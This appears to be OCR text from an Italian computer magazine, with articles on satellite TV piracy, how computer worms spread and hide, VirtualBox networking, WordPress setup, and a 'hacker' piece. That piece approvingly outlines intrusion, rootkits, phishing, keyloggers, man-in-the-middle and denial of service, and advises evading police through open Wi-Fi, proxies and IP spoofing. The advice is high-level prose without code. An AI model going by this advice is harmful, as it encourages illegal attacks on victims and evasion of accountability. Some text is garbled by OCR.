Box, che tramite card ufficiali inseri- 
ti in sistemi Common Interface gene- 
rici. Sul finire degli anni '90, però, il 
sistema Mediaguard venne violato e 
le tecniche di sblocco dei canali co- 
dificati fecero il giro del mondo gra- 
zie a Internet. I due operatori satel- 
litari italiani di allora, Tele+ e Stre- 
am, reagirono inizialmente con cam- 
bi di chiave frequenti ma proprio l'uti- 
lizzo della Rete rendeva inutile que- 
sta tecnica: poco dopo ogni cambio 
erano disponibili via Internet gli ag- 
giornamenti necessari per continuare 
la decodifica del segnale usando le 
card pirata. La situazione stava man 
mano diventando insostenibile per i 
due concorrenti: a fronte di investi- 
menti di grande portata, entrambe le 
piattaforme disponevano di un esi- 
guo numero di abbonati, pur riscon- 
trando una diffusione capillare di in- 
stallazione di impianti di ricezione. 
La situazione era tale che, nel 2002, 
entrambi gli operatori imposero agli 
abbonati il cambio delle smart card, 
implementando una versione miglio- 
rata del sistema di codifica chiama- 
ta Mediaguard 2. Conosciuto anche 
come Super Seca, poteva bloccare i 
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O A tutela della Ubera concorrenza, Adiconsum si era schierata nettamente a sfavore delle po- 
litiche di Skysul decoder proprietario. È stato inutile: la legge sul decoder unico è stata abrogata 
e Sky prosegue usando una tecnologia proprietaria. 



tentativi di hack e disponeva di una 
codifica più complessa, contribuen- 
do ad arginare il fenomeno della pi- 
rateria. Il sistema, però, restava an- 
cora alla portata della pirateria: le co- 
se erano solo diventate più comples- 
se. Dopo la fusione dei due operatori 
all'interno di Sky Italia, tuttavia, l'an- 
nuncio di quest'ultima di voler fare 
un cambio tecnologico generale ha 
dato lo stop definitivo alla pirateria. 
A differenza dei suoi predecessori, il 
nuovo sistema, chiamato NDS Vide- 
oguard, può funzionare solo trami- 
te un decoder proprietario a cui non 
vengono fornite schede di decodifica: 




O Svariati giornali tra cui il Times, svariate reti televisive tra cui la Fox, alcune case editrici 
tra cui la Harper Collins, MySpace e, naturalmente, Sky TV. Rupert Murdoch possiede la News 
Corporation, tra i maggiori gruppi multimediali del mondo. 



la tecnologia NDS è implementata in- 
ternamente. La smart card e il deco- 
der, in combinazione tra loro, posso- 
no essere autorizzati dall'emittente 
alla visione e sono inscindibili: l'uso 
di una smart card su un diverso de- 
coder, non autorizzato, non permette 
la corretta decodifica dei canali. 

:: ECCO il trUCCO! 

A rendere forte la tecnologia 
NDS, tuttavia, non è la sua strut- 
tura particolare quanto la pro- 
prietà dei brevetti che tutelano 
le tecnologie usate nel decoder. 
Il mancato rilascio di licenze da par- 
te dell'azienda che produce i deco- 
der (News Corporation che, guar- 
da caso, possiede anche Sky oltre 
a migliaia di altri media nel mondo) 
impedisce che qualche concorren- 
te possa creare decoder compatibi- 
li. Una situazione vista da molti co- 
me un monopolio, in netta contrap- 
posizione rispetto agli altri sistemi, 
visto che consente la produzione di 
decoder solo a determinati produt- 
tori e non a chiunque voglia entra- 
re nel mercato come concorrente. 
D'altra parte, questa chiusura tota- 
le a qualsiasi interferenza esterna, 
garantisce il sistema NDS da ogni 
tentativo di crack. A questo propo- 
sito occorre, tuttavia, registrare che 
nel 2005 è stato fatto un tentativo di 
reverse engineering da parte di un 
produttore di hardware indipenden- 
te, scoprendo che, applicando le re- 
centi tecnologie, solo l'accoppiata tra 
scheda e decoder garantisce il siste- 
ma NDS dall'essere inviolabile. 
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iene definito worm un pro- 
gramma che è in grado di re- 
plicarsi e diffondersi in mo- 
do autonomo ma che non 
necessita di alcun legame con al- 
tri eseguibili per infettare i sistemi. 
Esattamente come i vermi reali, che corro- 
dono dall'interno i frutti senza quasi lascia- 
re tracce all'esterno, i worm sono in gra- 
do di infettare i sistemi senza che l'uten- 
te si accorga della loro presenza, gene- 
ralmente senza alcun sensibile rallenta- 
mento del computer e senza tracce visi- 
bili. Non è un caso che nel panorama dei 



virus informatici attualmente in circolazio- 
ne i worm rappresentino la maggioranza 
assoluta e diano parecchio filo da torce- 
re a tutti gli antivirus. Così come non è un 
caso che la loro programmazione com- 
plessa abbia una sorta di fascino perver- 
so: non essendo ospitati all'interno di al- 
tri programmi, la libertà dei loro program- 
matori è pressoché assoluta e non han- 
no vincoli di dimensioni o di metodi di tra- 
smissione. Attualmente i worm possono 
fare qualsiasi cosa dei computer infetti, 
così come riescono a usare più metodi di 
contagio contemporaneamente. 



:: Modalità di infezione 

Il modo in cui i worm aggredisco- 
no i sistemi sono piuttosto vari 
e la complessità dei software in- 
stallati non fa altro che favorirli. 

Il metodo di contagio attualmente 
più impiegato è la posta elettronica, 
che permette infezioni tramite l'uti- 
lizzo delle tecniche più disparate. La 
più elementare è quella di messag- 
gi di posta che arrivano agli uten- 
ti con allegati eseguibili, mittenti co- 
nosciuti e allegati che contengono il 
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worm. Ovviamente, la spedizione di 
questi messaggi non avviene dai mit- 
tenti reali ma da copie del worm che 
sono entrate in possesso di dati es- 
senziali per portare a termine la loro 
riproduzione. Da questo punto di vi- 
sta, l'evoluzione dei mezzi tecnici uni- 
ta a una buona dose di social engi- 
neering fa miracoli: in circolazione ci 
sono worm che recuperano dai com- 
puter infettati i messaggi di posta in- 
viati e li duplicano, allegandosi, re-in- 
viandoli e cambiando soggetto delle 
mail. Questo comportamento, estre- 
mamente efficace, permette ai worm 



di non preoccuparsi di sfruttare de- 
bolezze di sistema ma concentrando- 
si sulla futura vittima: difficilmente un 
utente blocca i messaggi provenien- 
ti da un mittente con cui ha già dia- 
logato. Inoltre occorre segnalare che 
questa tecnica crea un certo livello di 
allarme continuo negli utenti non in- 
fetti, che li porta a ignorare moltissi- 
mi messaggi di posta: eventuali anti- 
virus che respingono i messaggi in- 
fetti, avvisano i mittenti dell'infezio- 
ne. Essendo mittenti fasulli, il risul- 
tato che si ottiene è quello di intasa- 
re la casella degli amici della vittima 
reale di messaggi di avviso. Social- 
mente si ottiene un allarme da parte 
degli utenti che, rapidamente, sfocia 
nell'indifferenza, rendendo comple- 
tamente inutili anche gli avvisi reali. 

Altro metodo di diffusione piuttosto 
usato è il contagio diretto via rete 
LAN: sfruttando i bug del sistema 
operativo ospite, i worm riescono a 
duplicarsi di computer in computer, 
intasando la rete a causa dei ten- 
tativi di attacco. In più, l'assoluta li- 
bertà dei programmatori di worm gli 
permette di agire persino sulle ap- 
parecchiature di rete, creando situa- 
zioni potenzialmente molto danno- 
se. Se sperimentalmente sono stati 




fatti tentativi fruttuosi di programmi 
in grado di modificare configurazio- 
ni di switch gestiti e router, una tec- 
nologia del genere non tarderà mol- 
to a mostrarsi utile anche per i worm. 
Tra l'altro, non è detto che l'attacco 
diretto escluda quello via mail o vi- 
ceversa: proprio a causa delle liber- 
tà dei programmatori e della man- 
canza di un supporto a cui collegar- 
si, i worm possono trasmettersi con 
più modalità contemporanee, an- 
che simultaneamente. È stata per- 
sino teorizzata e sperimentata, con 
successo, una tecnica che permet- 
te a un programma di gettare una te- 
sta di ponte che infetta un computer 
e provveda a scaricare codice dalla 
Rete per adattarsi all'ambiente tro- 
vato: un metodo di infezione che da- 
rebbe vita a un numero imprecisato e 
incontrollabile di varianti dello stesso 
virus, con conseguenze disastrose. 

Allo stesso tempo, le modalità di at- 
tivazione di un worm sono quanto di 
più vario possa esistere: un tentati- 
vo di riproduzione non deve per for- 
za avvenire al momento dell'infezio- 
ne ma può essere fatto secondo un 
preciso calendario oppure avviato 
da remoto. Così come un'infezione si 
può palesare in ambiti ben determi- 
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O II sito wlldllst.org mantiene un archivio aggiornato dei virus in circolazione mese per 
mese: nella maggioranza dei casi si tratta proprio di worm. 
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nati oppure restare silente per mesi 
e mesi, trasformando il computer vit- 
tima in uno zombie inconsapevole. A 
questo proposito occorre specificare 
che la mancata attivazione delle fun- 
zioni di un worm non impedisce che 
il computer resti contagioso: i tenta- 
tivi di infezione sono possibili anche 
se il worm non dà alcun segnale sul 
computer infetto. 

:: Il verme dentro 

Una volta contagiati da un worm, il suo 
primo scopo sarà quello di assicurar- 
si la stabile residenza sul computer. 

Proprio questo passaggio risulta il 
più affascinante dal punto di vista 
dell'analisi perché i worm attualmen- 
te in circolazione sfruttano, contem- 
poraneamente, un insieme di tec- 
nologie che li rende piuttosto diffi- 
cili da eliminare. Per potersi garan- 
tire lunga vita su un sistema infetto, 
per esempio, alcuni worm provvedo- 
no a copiarsi nelle cartelle di siste- 
ma con nomi simili a quelli di file le- 
gittimi, rendendone quasi impossibi- 
le l'identificazione manuale. Ovvia- 
mente, non è necessario che la co- 



pia sia una sola: in circolazione ci so- 
no worm che creano più copie di loro 
stessi, utilizzandone una come pro- 
cesso attivo di sistema e tenendo le 
altre come copie di sicurezza o copie 
avviate periodicamente per una rico- 
struzione nel caso venga fatto qual- 
che tentativo per estirparli. La mag- 
gior parte dei worm, inoltre, crea file 
con nomi codificati e basati su carat- 
teristiche uniche del computer, come 
il mac address della scheda di rete, 
così come applicano principi di me- 
tamorfosi al proprio codice, allo sco- 
po di rendere più difficoltosa la loro 
individuazione. Quest'ultima tecnica 
è molto complessa ma kit di svilup- 
po in circolazione su Internet l'hanno 
resa alla portata di chiunque. Consi- 
ste nello spostare blocchi di codice 
del worm all'interno dell'eseguibile, 
alterandoli con blocchi sinonimi (si- 
mili per funzionalità), così da man- 
tenere la copia eseguibile ma fun- 
zionalmente uguale al file origina- 
le. In questo modo, il file che con- 
tiene quella determinata copia del 
worm è nettamente diverso da quel- 
lo originale, offuscando l'infezione. 
L'aggancio al sistema operativo, quin- 



di il lancio del processo, può avveni- 
re, poi, nei modi più disparati: si va 
da chiavi aggiunte al registro alle vo- 
ci aggiunte ai file .INI, fino ad arrivare 
alla sostituzione di programmi legit- 
timamente installati sulla macchina 
con altri simili che contengono, pe- 
rò, le funzioni per il lancio del proces- 
so worm. Da questo punto di vista, la 
presenza di programmi estremamen- 
te complessi, composti da centina- 
ia di DLL ed eseguibili, è particolar- 
mente dannosa: è quasi impossibile 
identificare correttamente una DLL, 
per esempio, che funziona normal- 
mente ma che ha all'interno anche 
codice malevolo. Spesso, inoltre, gli 
agganci con il sistema operativo so- 
no più di uno e i worm includono del- 
le procedure che controllano di non 
avviarsi in più copie contemporanea- 
mente. Lo scopo, ovviamente, è quel- 
lo di rendere difficoltose le operazio- 
ni di pulizia, al punto che per alcuni 
worm particolarmente ostici, questa 
operazione deve essere fatta utiliz- 
zando programmi complementari agli 
antivirus ufficiali. Per fortuna, i worm 
che sostituiscono le DLL di sistema 
con copie funzionanti ma infette so- 
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O NOD32 è un antivirus particolarmente attivo nella prevenzione O L 'uso di un antivirus con un sistema di protezione residente ci 
ed estirpazione di worm, anche grazie al suo particolare sistema consente una certa tranquillità nell'uso del computer. Ma va ag- 
di protezione integrata e proattiva studiato proprio per questo. giornato periodicamente o risulterà totalmente inutile. 
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O St// s/fo virusbtn.com si trovano i test a cui sono stati sottoposti O Microsoft mantiene un sito, www.microsoft.com/security/por- 
gli antivirus in commercio. È evidente come l'attenzione verso il tal, in cui classifica le infezioni rinvenute dal suo Windows defend- 
fenomeno dei worm sia particolarmente alta. er. Anche qui, i worm la fanno da padroni. 



no ancora pochi ma si sono avute no- 
tizie di diversi esperimenti in questo 
senso: una strada piuttosto pericolo- 
sa perché renderebbe estremamente 
complesso il procedimento di indivi- 
duazione del worm. Parte integrante 
degli ultimi worm in circolazione so- 
no le tecniche che cercano di bloc- 
care eventuali antivirus in funzione 
sul sistema operativo infettato: alcu- 
ni worm riescono a identificare il no- 
me e la versione di un eventuale anti- 
virus, agendo sul sistema per blocca- 
re o eludere i sistemi di individuazio- 
ne. Per questo motivo è fondamenta- 
le tenere aggiornato il proprio antivi- 
rus: molti worm sanno come compor- 
tarsi davanti alle versioni più datate 
degli AV più diffusi e riescono ad ag- 
girarne le protezioni con effetti facil- 
mente prevedibili. 

:: Un motivo per tutto 

A questo punto c'è da chiedersi il 
motivo dell'utilizzo di tecniche tanto 
sofisticate per infettare un compu- 
ter ma la risposta è semplice: i soldi. 

Diversamente dai virus sviluppati fi- 
no a qualche anno fa, con scopi di- 
mostrativi, i worm proliferano grazie 
alla possibilità di usare i computer in- 
fettati per gli scopi più disparati. Un 



esempio di comportamento che dan- 
neggia direttamente gli utenti è l'in- 
stallazione di keylogger capaci di tra- 
smettere password e informazioni al 
creatore del worm. Un altro esempio 
riguarda la cattura e la trasmissione 
di informazioni sui messaggi di po- 
sta elettronica presenti: indirizzi di 
mittenti, di destinatari, contenuti del- 
le mail. Teoricamente non vi sono li- 
miti a quello che può essere fatto sul 
computer vittima, specialmente se 
questo è collegato con continuità al- 
la Rete, incluso il redirect della navi- 
gazione su siti predefiniti, inserimen- 
ti inattesi di pubblicità, truffe e via di- 
cendo. Queste tecniche, pur danno- 
se, sono attualmente considerate il 
minore dei mali perché colpiscono i 
singoli. Decisamente più dannosi so- 
no i worm creati allo scopo di inseri- 
re i computer infetti in grid malevole. 
È il caso, per esempio, dei computer 
coinvolti in attacchi Denial Of Service 
oppure in quelli usati per attacchi Bru- 
te Force. Tecniche che, oltre a rap- 
presentare un pericolo per le vittime 
principali, hanno ripercussioni note- 
voli anche sulla comunità di computer 
non infetti: la replicazione dei worm e 
il coordinamento degli attacchi, oltre 
che gli attacchi stessi, utilizzano ban- 
da, rallentando l'intera Rete. 



:: Tecniche di difesa 

Se i creatori di worm sono all'opera 
per progettare i drammi informatici 
di domani, una vasta community di 
tecnici è costantemente all'opera per 
prendere le dovute contromisure. 
La prima è quella, comune, usata 
per difendersi dai normali virus: un 
buon antivirus, aggiornato in modo 
frequente. È la prima barriera di di- 
fesa per qualsiasi computer. Il se- 
condo strumento di protezione è un 
buon firewall. Non tanto quello inclu- 
so in Windows, facilmente superabile 
anche dai virus meno evoluti, quan- 
to uno dei tanti prodotti commerciali 
a nostra disposizione. Meglio, addi- 
rittura, se possiamo disporre di un fi- 
rewall hardware, che incorpori sistemi 
di controllo del traffico di connessio- 
ne. Al rilevamento di traffico anomalo, 
questi firewall possono intervenire in 
modo automatico, bloccando le con- 
nessioni e limitando il contagio. Altro 
strumento utile sono le sandbox: ge- 
neralmente sono macchine virtuali in 
cui è possibile installare i programmi 
prima di installarli sul sistema princi- 
pale. Metodo, questo, che ci mette al 
riparo dalla maggior parte del mal- 
ware in circolazione in cambio di una 
piccola perdita di tempo. 
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0irtualbox è un eccellente pro- 
gramma per creare e gestire 
macchine virtuali. Fino a po- 
co tempo fa, però, mancava di 
una procedura semplificata per confi- 
gurare le opzioni di rete avanzate nei 
sistemi guest (le macchine virtuali): 
nel caso avessimo voluto far dialoga- 
re la macchina host (il PC reale) con 
i sistemi guest, ad esempio, avrem- 
mo dovuto procedere ad una configu- 
razione un poco laboriosa. Dalla re- 
lease 2.0 in poi, Virtualbox consente 
invece una più duttile configurazio- 
ne delle interfacce di rete dei siste- 
mi guest direttamente dall'interfac- 
cia grafica del programma. Scopria- 



mo insieme queste nuove possibili- 
tà, utilizzando come sistema di rife- 
rimento Ubuntu Linux 9.04. 

:: installazione 
di Virtualbox 

Innanzitutto, installiamo l'ultima ver- 
sione disponibile di Virtualbox. Nei 
repository di Ubuntu è presente la 
versione OSE (Open Source Edition) 

del programma ma noi andremo ad 
installare la versione commerciale di 
Virtualbox, priva delle restrizioni pre- 
senti nell'applicazione OSE. Per fa- 
re questo aggiungeremo un reposi- 



tory di pacchetti a quelli presenti di 
default su Ubuntu. Apriamo una fine- 
stra di terminale e lanciamo il coman- 
do "sudo nano/etc/apt/sources.list". 
Comparirà l'interfaccia dell'editor Na- 
no, con aperto il file di configurazio- 
ne dei repository Ubuntu. Raggiun- 
giamo la fine del file ed inseriamo la 
riga seguente: 

deb http://download.virtualbox.org/vir- 
tualbox/debian jaunty non-free (Fig. 1) 

Salviamo il file premendo Ctrl + O e 
poi Invio. Quindi usciamo dall'editor 
con la combinazione di tasti Ctrl + 
X. Tornati nella finestra di terminale, 
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• F/g. 1. Per installare l'ultima versione di 
Virtualbox aggiungiamo una riga al file di 
configurazione dei repository. 

aggiungiamo la chiave pubblica del 
nuovo repository lanciando il coman- 
do che segue: 

wget -q http://download.virtualbox. 
org/virtualbox/debian/sun_vbox.asc 
-O- 1 sudo apt-key add - 

Eseguiamo "sudo apt-get update" e 
quindi "sudo apt-get instali virtual- 
box-2.2" per installare Virtualbox nel 
nostro sistema. Ora lanciamo il pro- 
gramma dal menu Applicazioni > 
Strumenti di sistema > Sun Virtual- 
Box (Fig. 2). 

:: l tipi di rete per 
le macchine virtuali 

Per configurare correttamente la 
rete delle nostre macchine vir- 
tuali dobbiamo conoscere qua- 
li sono le modalità di rete mes- 
se a disposizione da Virtualbox. 
La modalità di default è NAT, che per- 
mette ad una macchina virtuale di 
accedere alla rete esterna, Internet, 
ottenendo un indirizzo IP dal server 
DHCP interno di Virtualbox; in que- 
sta modalità, però, i sistemi guest 
non sono normalmente raggiungibi- 
li dall'esterno. Il modo più semplice 
per fornire servizi su Internet utiliz- 
zando una macchina virtuale, quindi, 
è quello di usare la modalità Bridged: 
in questo caso il sistema guest potrà 
ottenere un indirizzo IP che sarà rag- 



giungibile sia dal PC host che dalla 
rete esterna. Un'altra modalità utile 
è host-only, che consente di creare 
un'interfaccia di rete virtuale per far 
comunicare esclusivamente la mac- 
china host ed i sistemi guest. 

:: Configurazione Bridged 
ed host-only 

Se vogliamo attivare un ser- 
ver web su una macchina virtua- 
le, quindi, non dobbiamo far al- 
tro che configurare la rete del si- 
stema guest in modalità Bridged. 
Per modificare la configurazione di una 
macchina guest, selezioniamo nella fi- 
nestra di Virtualbox la macchina su cui 
vogliamo intervenire; quindi entriamo 
nella linguetta Dettagli e clicchiamo 
sulla sezione Rete. Nella finestra che 
appare assicuriamoci, innanzitutto, 
che sia selezionata l'opzione "Abilita 
scheda di rete". Poi scegliamo "Sche- 
da con Bridge" come valore dell'opzio- 
ne "Connessa a" e stabiliamo l'inter- 
faccia da usare tramite l'opzione "No- 
me" (lasciamo pure il valore "ethO" di 
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• Fig.2. L'interfaccia grafica di Virtualbox. 
Semplice da usare ma completa e duttile. 

default, che indica la prima interfaccia 
di rete Ethernet). Per attivare la moda- 
lità host-only, invece, è sufficiente se- 
lezionare nella sezione Rete il valore 
"Scheda solo host" dell'opzione "Con- 
nessa a" (Fig. 3). 

:: Modalità NAT 
e pori forwarding 

Nel caso volessimo comunque far 
uso della modalità di rete di de- 
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• Fig.3. In questa finestra impostiamo la 
modalità direte Bridged. 

fault, NAT, possiamo fornire dei 
servizi di rete all'esterno utilizzan- 
do la tecnica del port forwarding: 

quello che faremo, cioè, sarà trasfe- 
rire dei pacchetti da una porta sul si- 
stema host ad una porta sul sistema 
guest. Ecco come procedere. 

Spegniamo la macchina virtuale su 
cui va abilitato il port forwarding, 
quindi in un terminale lanciamo il co- 
mando VBoxManage come nelle ri- 
ghe seguenti: 

VBoxManage setextradata debian 
"VBoxIntern a I/Devi ces/pcnet/O/ 
LUN#0/Config/apache/Protocol" TCP 
VBoxManage setextradata debian 
"VBoxIntern al/Devi ces/pcnet/O/ 
LUN#0/Confìg/apache/GuestPort" 80 
VBoxManage setextradata debian 
"VBoxlnternal/Devices/pcnet/0/LUN#0/ 
Conf ig/apache/HostPort" 8080 

In queste righe viene attivata la rego- 
la di port forwarding chiamata "apa- 
che" sul sistema guest "debian", uti- 
lizzando la prima scheda di rete PC- 
Net (pcnet/0). La scheda di rete di ti- 
po PCNet è quella impostata di de- 
fault. Nella prima riga si stabilisce il 
protocollo da usare per il port forwar- 
ding, TCP, nella seconda la porta sul 
sistema Guest, 80, e nella terza riga 
la porta corrispettiva sul sistema host, 
8080. Con questo esempio, dunque, 
i pacchetti che arriveranno sulla por- 
ta 8080 del PC host saranno dirottati 
sulla porta 80 della macchina guest. 
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une cosa Bisogna sapere per essere Hacker 






i 



hacker si destreggia con 
disinvoltura tra le questioni 
di sicurezza informatica, 
ma ci sono situazioni in 
cui sapersi difendere "solo un po'" 
non basta, bisogna saper attaccare. 
Con intelligenza e destrezza, con le 
giuste precauzioni e un pizzico di sag- 
gezza, ma conoscere i metodi di attacco 
può tornare utile in molte situazioni. 
Tutto dipende dall'obiettivo che ci siamo 
posti: tecniche che funzionano in un 
contesto possono portare al disastro in 
un altro, quindi facciamo attenzione. 

:: Il fine giustifica i mezzi 

Le tecniche di attacco, come vedremo 
tra breve, sono diverse e portano 
ognuna a un risultato diverso: 

la nostra bravura sta nel scegliere 
quella giusta secondo la situazione. 



Prima però di iniziare la trattazione 
di un argomento così scottante, è 
bene soffermarsi un attimo su alcune 
questioni di etica, di moralità, che 
devono per forza essere affrontate. 
Innanzitutto, sapere come fare una 
cosa non significa necessariamente 
che la si debba fare. È giusto porsi 
dei limiti, perché si tratta di compor- 
tamenti comunque sia illegali e noi 
non vogliamo di certo abbassarci al 
livello di una certa stregua di lamer 
che provano gusto solo nel danneg- 
giamento altrui. Nella maggior parte 
dei casi, ci basta spaventare un po' 
la nostra vittima, fargli vedere che 
le nostre arti marziali sono più forti 
delle sue, e avremo ottenuto il nostro 
scopo. Basta, fermiamoci: andare 
oltre può voler dire infierire inutilmente 
contro un nemico già sconfitto e può 
ritorcesi contro di noi. 



:: Il miglior attacco 
è la difesa 



Un sistema di attacco hacker 
efficace non è quello che ci per- 
mette di raggiungere facilmente 
lo scopo, ma quello che riesce 
a farlo senza farci individuare. 
Prima ancora di imparare ad attaccare, 
bisogna sapere a menadito le regole 
della difesa: sarebbe inutile vantarsi 
di essere entrati nel server dell'FBI 
se poi veniamo svegliati all'alba 
con un distintivo davanti agli occhi. 
Regola numero uno: rendiamoci invi- 
sibili. Agiamo in reti in cui ogni com- 
puter è identificato da un indirizzo IP, 
se qualcuno è in grado di risalire la 
catena fino a noi, abbiamo chiuso. Non 
basta il firewall, per quanto potente 
sia: alle forze dell'ordine basta sapere 
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che l'attacco è partito dal nostro com- 
puter, anche se non riescono a intro- 
dursi perché i nostri strumenti li fanno 
rimbalzare. Inganno, fuorvianza, illu- 
sione: chi ci insegue deve credere 
che non siamo noi ad agire e, nella 
migliore delle ipotesi, arenarsi su un 
punto morto, spiaggiarsi come una 
balena che ha perduto l'orientamento. 
È d'obbligo quindi ridurre al massimo 
la footprint del nostro sistema ope- 
rativo (Linux rulez!), collegarci da una 
rete non nostra, meglio se wireless e 
non protetta, come quelle disponibili 
in certi luoghi pubblici, passare da uno 
o più server proxy anonimi a cui acce- 
diamo mediante tunneling criptato e 
fingere di essere un altro computer 
con tecniche di spoofing dell'indirizzo 
IP. Sembra difficile? Nessuno ha mai 
detto che sarebbe stato facile. Se 
vogliamo fare le cose semplici, pro- 
viamo con la classica botnet costruita 
con un malware di qualche tipo, da 
vero lamer che si rispetti, e prepa- 
riamoci a subirne le conseguenze. 
Stessa cosa per gli attacchi in locale: 
se installiamo qualcosa su un com- 
puter per tenerlo sotto controllo, deve 
essere assolutamente invisibile. 

:: ACCeSSO 

Uno scopo per cui si compiono 
azioni di attacco è ottenere l'ac- 
cesso a un sistema remoto. Possono 
verificarsi diverse situazioni: 

se abbiamo la possibilità di accedere 
fisicamente al sistema vittima abbiamo 



modo di installare software utile per 
raggiungere il nostro obiettivo, per 
esempio la classica backdoor che ci 
fornirà accesso nascosto. In alcuni casi 
questo non è possibile, quindi bisogna 
studiare pazientemente il sistema in 
questione per individuarne le debo- 
lezze. Nella migliore delle ipotesi, pos- 
siamo sfruttare una di queste falle per 
mettere in azione il nostro rootkit e 
garantirci accesso con il massimo dei 
privilegi, e allora il sistema sarà nostro. 
A volte invece bisogna agire con più 
astuzia: un po' di social engineering per 
rubare una password, tecniche di phi- 
shing per gabbare un facilotto e rubargli 
i dati di accesso o spingerlo a installare 
un programma che abbiamo approntato 
e farlo diventare il nostro zombie. Tutto 
va valutato caso per caso. 

:: Spiare 

Le situazioni che si possono veri- 
ficare sono due: abbiamo accesso 
fisico (o da remoto con possibilità 
di installare software, vedi rootkit) 

al computer vittima e vogliamo tenere 
sotto controllo cosa succede mentre 
viene utilizzato, oppure non abbiamo 
accesso ma possiamo intercettarne 
le comunicazioni via rete. Nel primo 
caso, abbiamo bisogno di un keylogger 
abbastanza evoluto da individuare più 
dati possibili (alcuni rubano solo la 
digitazione, altri più evoluti 
permettono di catturare y^^V 
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schermate, riportano il titolo delle 
finestre e addirittura loggano anche le 
conversazioni via chat o messenger). 
Nel secondo caso ci servono almeno 
un portscanner per individuare i punti 
di accesso e i servizi resi disponibili 
dal computer e un packet sniffer per 
rubare il traffico di rete e interpretarne 
il contenuto. Il classico tipo di attacco 
in questo caso è detto "man in the 
middle", cioè l'uomo in mezzo: si con- 
fonde uno dei due computer tra cui 
intercorre la comunicazione facendosi 
passare per l'altro, si cattura il traffico 
e si inoltrano i pacchetti al destinatario 
per mascherare la nostra presenza. 



:: Colpire 



Colpire significa attaccare nel 
vero senso della parola, cioè agire 
per arrecare danno a qualcuno. 

Tralasciando tutto ciò che si può fare 
quando si riesce a ottenere accesso 
come root sul PC di un malcapitato, 
come eliminare file a caso, cambiare le 
configurazioni di sistema per renderlo 
inservibile, finanche formattare i dischi, il 
tipico attacco portato via rete consiste nel 
Denial of Service. In sostanza, è rendere 
il computer temporaneamente inabile a 
rispondere alle richieste che gli vengono 
inoltrate via rete, con un sovraccarico di 
altre richieste che finiscono col succhiare 
tutte le risorse del computer (memoria 
e banda soprattutto). Nel migliore dei 
casi, l'obiettivo si inchioda tanto da 
costringere qualcuno a riavviarlo, il 
che in caso di server pubblici può suc- 
cedere anche dopo l'intero weekend: 
anche i tecnici vanno in vacanza. 
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estire autonomamente il pro- 
prio blog ha senz'altro notevo- 
li vantaggi rispetto all'utilizzo 
di piattaforme di hosting co- 
me wordpress.com o blogger.com: 
tra tutti, una libertà assoluta nell'ag- 
giungere funzionalità al proprio blog 
e nel modificarne l'aspetto. Tutta 
questa libertà, però, comporta la ne- 
cessità di dover sperimentare spes- 
so nuove soluzioni, verificando che 
tutto funzioni sempre correttamente. 
Perché, quindi, non installare una co- 
pia del nostro blog direttamente sul 
PC di casa, in modo tale da impiega- 
re quest'ultimo come "laboratorio di 
test" per modifiche ed innovazioni sul 
quello effettivo? In queste due pagi- 



ne, dunque, scopriremo come instal- 
lare e configurare Wordpress, la nota 
e diffusa applicazione per la gestione 
di blog, su un computer con sistema 
operativo Ubuntu 9.04. 

:: La procedura 
di installazione 

Per poter funzionare, Wordpress ri- 
chiede la presenza di un completo 
ambiente LAMP, acronimo che sta 
per "Linux Apache MySQL PHP": 

vediamo, innanzitutto, come installa- 
re i vari componenti di questo. Apria- 
mo una console di terminale (in Gno- 
me andiamo sul menu Applicazioni e 



clicchiamo su Accessori, Terminale) 
e lanciamo il comando "sudo tasksel 
instali lamp-server", che provvedere 
a scaricare da Internet e ad installa- 
re tutti i pacchetti richiesti. Ad un cer- 
to punto ci verrà richiesto di stabili- 
re una password per l'utente ammi- 
nistratore del database MySQL (Fi- 
gura 1): digitiamo la password pre- 
scelta e poi reinseriamola per con- 
ferma. Installato l'ambiente LAMP, 
procediamo al download dell'applica- 
zione Wordpress. Con un web brow- 
ser apriamo la pagina http://www. 
wordpress-it.it/wordpress-in-italia- 
no/ (Figura 2) e clicchiamo sul link 
dell'ultima versione di Wordpress lo- 
calizzato in italiano (al momento del- 
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O Figura 1. Indichiamo una password per l'utente di amministrazione, root, di MySQL. 



la stesura dell'articolo, il file da sca- 
ricare è wordpress_it_IT_271.zip). 
Terminato il download, creiamo in / 
var/www la directory per il nostro 
blog con il comando "sudo mkdir / 
var/www/blog" e, quindi, scompat- 
tiamo in questa directory l'archivio 
zip di wordpress: 

sudo unzip wordpress_it_IT_271. 
zip -d /var/www/blog 

:: Creiamo il database 
per Wordpress 

A questo punto dobbiamo creare 
il database necessario per il fun- 
zionamento di Wordpress. Per fare 
questo utilizzeremo il semplice ma 
efficiente client testuale di MySQL. 
In una console di terminale lancia- 
mo il comando "mysql -u root -p" 
e, quindi, inseriamo la password per 
l'utente root di MySQL che abbia- 
mo stabilito in precedenza. Ci acco- 



glierà il prompt del client di MySQL. 
Qui eseguiamo i tre comandi che se- 
guono: 

CREATE DATABASE wordpress; 
GRANT ALL PRIVILEGES ON 
wordpress.* TO "utente"@"localhost" 
IDENTIFIED BY "password"; 
FLUSH PRIVILEGES; 
Nel secondo comando, al posto di 
"utente" inseriamo il nome dell'utente 
del database di Wordpress (ad esem- 
pio, possiamo usare "wordpress" co- 
me nome) ed al posto di "password" 
la password relativa a quest'utente. I 
due valori che inseriamo qui ci ser- 
viranno nella successiva configura- 
zione di Wordpress. Eseguiti i tre co- 
mandi indicati, usciamo dal client di 
MySQL lanciando il comando interno 
"EXIT" (Figura 3). 

:: Configuriamo Wordpress 

Dopo aver generato il database, 
è il momento di inserire in un fi- 
le di configurazio- 
ne di Wordpress le in- 
formazioni sul data- 
base appena creato. 
In un terminale entria- 
mo dunque nella directo- 
ry in cui abbiamo scom- 
pattato l'archivio di Wor- 
dpress ("ed /var/www/ 
blog") e lanciamo il co- 
mando "sudo nano wp- 
config-sample.php". 
Nel file che viene aperto 
dall'editor nano cerchia- 
mo la riga "define('DB_ 
NAME', 'putyourdbna- 
mehere');" ed inseriamo 
O Figura 2. La pagina Web da cui possiamo scaricare al posto di 'putyourdbna- 
l 'applicazione Wordpress localizzata in lingua italiana è mehere'ilnomedeldata- 
www.wordpress-it.it base creato nel paragra- 
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fo precedente (nel nostro caso, 'wor- 
dpress'). Poi interveniamo sulla riga 
"define('DB_USER', 'usernamehe- 
re');" inserendo invece di 'userna- 
mehere' il nome dell'utente del da- 
tabase (ancora 'wordpress'). Infine 
cambiamo la riga "define('DB_PAS- 
SWORD', 'yourpasswordhere');" 
inserendo al posto di 'yourpasswor- 
dhere' la password che abbiamo sta- 
bilito per l'utente del database. Fat- 
to ciò, premiamo i tasti Ctrl + O e 
poi Invio per salvare le modifiche al 
file e schiacciamo Ctrl + X per usci- 
